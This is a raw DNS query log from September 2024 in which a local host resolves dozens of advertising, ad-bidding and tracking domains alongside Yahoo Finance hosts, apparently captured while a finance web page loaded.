                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.854583025 CEST192.168.2.41.1.1.10x483fStandard query (0)fastlane.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.866084099 CEST192.168.2.41.1.1.10xd3c4Standard query (0)display.bidder.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.866230965 CEST192.168.2.41.1.1.10x3f43Standard query (0)display.bidder.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.871575117 CEST192.168.2.41.1.1.10x4f4aStandard query (0)images.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.871737957 CEST192.168.2.41.1.1.10xad6eStandard query (0)images.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.873950005 CEST192.168.2.41.1.1.10x6876Standard query (0)htlb.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.874424934 CEST192.168.2.41.1.1.10x24f5Standard query (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.881949902 CEST192.168.2.41.1.1.10x97b5Standard query (0)bidder.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.882117987 CEST192.168.2.41.1.1.10xa1e4Standard query (0)bidder.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.885396957 CEST192.168.2.41.1.1.10x20d5Standard query (0)rtb.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.885519028 CEST192.168.2.41.1.1.10x2e9fStandard query (0)rtb.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.898622036 CEST192.168.2.41.1.1.10x756bStandard query (0)hbopenbid.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.898762941 CEST192.168.2.41.1.1.10xafdeStandard query (0)hbopenbid.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.902123928 CEST192.168.2.41.1.1.10xed6aStandard query (0)prebid.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.902266979 CEST192.168.2.41.1.1.10x9128Standard query (0)prebid.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.907272100 CEST192.168.2.41.1.1.10x7ba7Standard query (0)tlx.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.907272100 CEST192.168.2.41.1.1.10x13f5Standard query (0)tlx.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.912584066 CEST192.168.2.41.1.1.10x7834Standard query (0)ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.912584066 CEST192.168.2.41.1.1.10x1ecaStandard query (0)ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.914763927 CEST192.168.2.41.1.1.10xaa43Standard query (0)pips.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.914983034 CEST192.168.2.41.1.1.10x8c64Standard query (0)pips.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.922415018 CEST192.168.2.41.1.1.10x3789Standard query (0)uipus.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.923245907 CEST192.168.2.41.1.1.10xa1ecStandard query (0)uipus.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.936755896 CEST192.168.2.41.1.1.10x4ffbStandard query (0)rp.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.936944962 CEST192.168.2.41.1.1.10x302Standard query (0)rp.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:13.400815010 CEST192.168.2.41.1.1.10x1372Standard query (0)i.clean.ggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:13.401602030 CEST192.168.2.41.1.1.10x1855Standard query (0)i.clean.gg65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.198772907 CEST192.168.2.41.1.1.10xc630Standard query (0)beacon.bidder.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.199057102 CEST192.168.2.41.1.1.10x9ae2Standard query (0)beacon.bidder.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.529536963 CEST192.168.2.41.1.1.10x3cd4Standard query (0)pbd.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:15.529898882 CEST192.168.2.41.1.1.10x574aStandard query (0)pbd.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.231272936 CEST192.168.2.41.1.1.10x4db4Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.231465101 CEST192.168.2.41.1.1.10x50c7Standard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.549175024 CEST192.168.2.41.1.1.10xd726Standard query (0)finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.549652100 CEST192.168.2.41.1.1.10xb18Standard query (0)finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.774352074 CEST192.168.2.41.1.1.10xe610Standard query (0)rp.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:16.774494886 CEST192.168.2.41.1.1.10x40a6Standard query (0)rp.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:17.874128103 CEST192.168.2.41.1.1.10x60edStandard query (0)pbd.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:17.874752998 CEST192.168.2.41.1.1.10xe8f2Standard query (0)pbd.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:17.950884104 CEST192.168.2.41.1.1.10xd971Standard query (0)s.aolcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:17.951129913 CEST192.168.2.41.1.1.10x585Standard query (0)s.aolcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.972621918 CEST192.168.2.41.1.1.10x9fcaStandard query (0)ssum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.972827911 CEST192.168.2.41.1.1.10xfccStandard query (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.973176956 CEST192.168.2.41.1.1.10x882bStandard query (0)ads.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.973315954 CEST192.168.2.41.1.1.10x53c5Standard query (0)ads.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.974246979 CEST192.168.2.41.1.1.10xf341Standard query (0)u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.974396944 CEST192.168.2.41.1.1.10xedd6Standard query (0)u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.975255013 CEST192.168.2.41.1.1.10x4253Standard query (0)eus.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.975449085 CEST192.168.2.41.1.1.10xc4aeStandard query (0)eus.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.975788116 CEST192.168.2.41.1.1.10x2d60Standard query (0)eb2.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.975956917 CEST192.168.2.41.1.1.10x42bfStandard query (0)eb2.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.976344109 CEST192.168.2.41.1.1.10x17d5Standard query (0)js-sec.indexww.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.976629019 CEST192.168.2.41.1.1.10xe63Standard query (0)js-sec.indexww.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.977123976 CEST192.168.2.41.1.1.10x334aStandard query (0)ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.977267027 CEST192.168.2.41.1.1.10xff6aStandard query (0)ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.977597952 CEST192.168.2.41.1.1.10x1210Standard query (0)ads.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:18.977817059 CEST192.168.2.41.1.1.10x15ceStandard query (0)ads.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:20.595752954 CEST192.168.2.41.1.1.10x7927Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:20.596148968 CEST192.168.2.41.1.1.10x3769Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.136677980 CEST192.168.2.41.1.1.10xec79Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.136833906 CEST192.168.2.41.1.1.10x3047Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.285583019 CEST192.168.2.41.1.1.10x9e9eStandard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.286125898 CEST192.168.2.41.1.1.10x728fStandard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.287954092 CEST192.168.2.41.1.1.10x629eStandard query (0)query2.finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.288175106 CEST192.168.2.41.1.1.10x3451Standard query (0)query2.finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.288901091 CEST192.168.2.41.1.1.10xe0d5Standard query (0)query1.finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.289108992 CEST192.168.2.41.1.1.10xb3d2Standard query (0)query1.finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.292176008 CEST192.168.2.41.1.1.10xf9cbStandard query (0)sync.1rx.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.292393923 CEST192.168.2.41.1.1.10x33fStandard query (0)sync.1rx.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:22.195210934 CEST192.168.2.41.1.1.10x8986Standard query (0)wnsrvbjmeprtfrnfx.ay.deliveryA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:22.195728064 CEST192.168.2.41.1.1.10x63b5Standard query (0)wnsrvbjmeprtfrnfx.ay.delivery65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.149653912 CEST192.168.2.41.1.1.10x350dStandard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.150470972 CEST192.168.2.41.1.1.10xadb4Standard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.157331944 CEST192.168.2.41.1.1.10x511dStandard query (0)sync-tm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.157958031 CEST192.168.2.41.1.1.10x7095Standard query (0)sync-tm.everesttech.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.200870991 CEST192.168.2.41.1.1.10xee34Standard query (0)token.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.201138020 CEST192.168.2.41.1.1.10xa5caStandard query (0)token.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.221071959 CEST192.168.2.41.1.1.10x34c0Standard query (0)s.aolcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.221508026 CEST192.168.2.41.1.1.10xb4eeStandard query (0)s.aolcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.223799944 CEST192.168.2.41.1.1.10xdc38Standard query (0)ads.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.224143028 CEST192.168.2.41.1.1.10x4f9fStandard query (0)ads.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.226711035 CEST192.168.2.41.1.1.10xb95cStandard query (0)eus.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.226896048 CEST192.168.2.41.1.1.10xe32Standard query (0)eus.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.227664948 CEST192.168.2.41.1.1.10xcf5Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.227978945 CEST192.168.2.41.1.1.10xf5b7Standard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.229897976 CEST192.168.2.41.1.1.10xd707Standard query (0)pr-bh.ybp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.230110884 CEST192.168.2.41.1.1.10x5e10Standard query (0)pr-bh.ybp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.231753111 CEST192.168.2.41.1.1.10x7c13Standard query (0)smarttag.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.232439995 CEST192.168.2.41.1.1.10xd8a8Standard query (0)smarttag.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.466730118 CEST192.168.2.41.1.1.10xbdf2Standard query (0)qsearch-a.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.467005014 CEST192.168.2.41.1.1.10x5f0aStandard query (0)qsearch-a.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.472028971 CEST192.168.2.41.1.1.10xcc5cStandard query (0)ch-trc-events.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.472179890 CEST192.168.2.41.1.1.10x5685Standard query (0)ch-trc-events.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.476876020 CEST192.168.2.41.1.1.10x55b3Standard query (0)vidanalytics.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.477122068 CEST192.168.2.41.1.1.10x4eb7Standard query (0)vidanalytics.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.479836941 CEST192.168.2.41.1.1.10x3d78Standard query (0)static.criteo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.480146885 CEST192.168.2.41.1.1.10xc03dStandard query (0)static.criteo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.481081009 CEST192.168.2.41.1.1.10xbe7dStandard query (0)sync-tm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.481249094 CEST192.168.2.41.1.1.10xfb6fStandard query (0)sync-tm.everesttech.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.240437984 CEST192.168.2.41.1.1.10x844fStandard query (0)image6.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.240931034 CEST192.168.2.41.1.1.10xb8afStandard query (0)image6.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.275598049 CEST192.168.2.41.1.1.10x36e0Standard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.275762081 CEST192.168.2.41.1.1.10xb7c7Standard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.299228907 CEST192.168.2.41.1.1.10xbd4cStandard query (0)ad.turn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.299413919 CEST192.168.2.41.1.1.10xe69cStandard query (0)ad.turn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.404758930 CEST192.168.2.41.1.1.10x3458Standard query (0)trc.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.404918909 CEST192.168.2.41.1.1.10x231aStandard query (0)trc.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.594676018 CEST192.168.2.41.1.1.10xa47eStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.594825983 CEST192.168.2.41.1.1.10x4cf4Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.603240967 CEST192.168.2.41.1.1.10x2f4bStandard query (0)wnsrvbjmeprtfrnfx.ay.deliveryA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.603409052 CEST192.168.2.41.1.1.10x7999Standard query (0)wnsrvbjmeprtfrnfx.ay.delivery65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.603638887 CEST192.168.2.41.1.1.10x60Standard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.603775978 CEST192.168.2.41.1.1.10x12d3Standard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.604444027 CEST192.168.2.41.1.1.10x9738Standard query (0)pixel-eu.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.604566097 CEST192.168.2.41.1.1.10x341bStandard query (0)pixel-eu.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.618273973 CEST192.168.2.41.1.1.10x5c6bStandard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.618417978 CEST192.168.2.41.1.1.10xf8dfStandard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.619281054 CEST192.168.2.41.1.1.10x2bf7Standard query (0)sync.srv.stackadapt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.619508028 CEST192.168.2.41.1.1.10xe5edStandard query (0)sync.srv.stackadapt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.621582985 CEST192.168.2.41.1.1.10xa0bdStandard query (0)image8.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.621725082 CEST192.168.2.41.1.1.10xc320Standard query (0)image8.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.801824093 CEST192.168.2.41.1.1.10x10e6Standard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.801959038 CEST192.168.2.41.1.1.10xb9f1Standard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.802536011 CEST192.168.2.41.1.1.10x769eStandard query (0)ssp.disqus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.802659035 CEST192.168.2.41.1.1.10x427Standard query (0)ssp.disqus.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.810653925 CEST192.168.2.41.1.1.10xad1fStandard query (0)yahoo-match.dotomi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.810792923 CEST192.168.2.41.1.1.10x5981Standard query (0)yahoo-match.dotomi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.941637039 CEST192.168.2.41.1.1.10xd3fdStandard query (0)rtb.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.957262993 CEST192.168.2.41.1.1.10x9798Standard query (0)rtb.gumgum.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.032289982 CEST192.168.2.41.1.1.10xc807Standard query (0)beacon-ams3.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.032427073 CEST192.168.2.41.1.1.10x11c9Standard query (0)beacon-ams3.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.040544987 CEST192.168.2.41.1.1.10x2db7Standard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.040680885 CEST192.168.2.41.1.1.10xaec0Standard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.270709038 CEST192.168.2.41.1.1.10x8101Standard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.270850897 CEST192.168.2.41.1.1.10x2deeStandard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.397028923 CEST192.168.2.41.1.1.10x160Standard query (0)sync.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.397321939 CEST192.168.2.41.1.1.10x59b0Standard query (0)sync.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.398385048 CEST192.168.2.41.1.1.10x3e97Standard query (0)cr.frontend.weborama.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.398518085 CEST192.168.2.41.1.1.10x8f75Standard query (0)cr.frontend.weborama.fr65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.399399042 CEST192.168.2.41.1.1.10xeaaeStandard query (0)mwzeom.zeotap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.399524927 CEST192.168.2.41.1.1.10xb84aStandard query (0)mwzeom.zeotap.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.400621891 CEST192.168.2.41.1.1.10xfb59Standard query (0)uipglob.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.400840998 CEST192.168.2.41.1.1.10xdbf8Standard query (0)uipglob.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.403759003 CEST192.168.2.41.1.1.10x4c36Standard query (0)um.simpli.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.403897047 CEST192.168.2.41.1.1.10x1495Standard query (0)um.simpli.fi65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.519124031 CEST192.168.2.41.1.1.10x6cf5Standard query (0)smarttag.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.519488096 CEST192.168.2.41.1.1.10xd2e4Standard query (0)smarttag.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.523612976 CEST192.168.2.41.1.1.10x634eStandard query (0)pr-bh.ybp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:25.523864031 CEST192.168.2.41.1.1.10x9206Standard query (0)pr-bh.ybp.yahoo.com65IN (0x0001)false
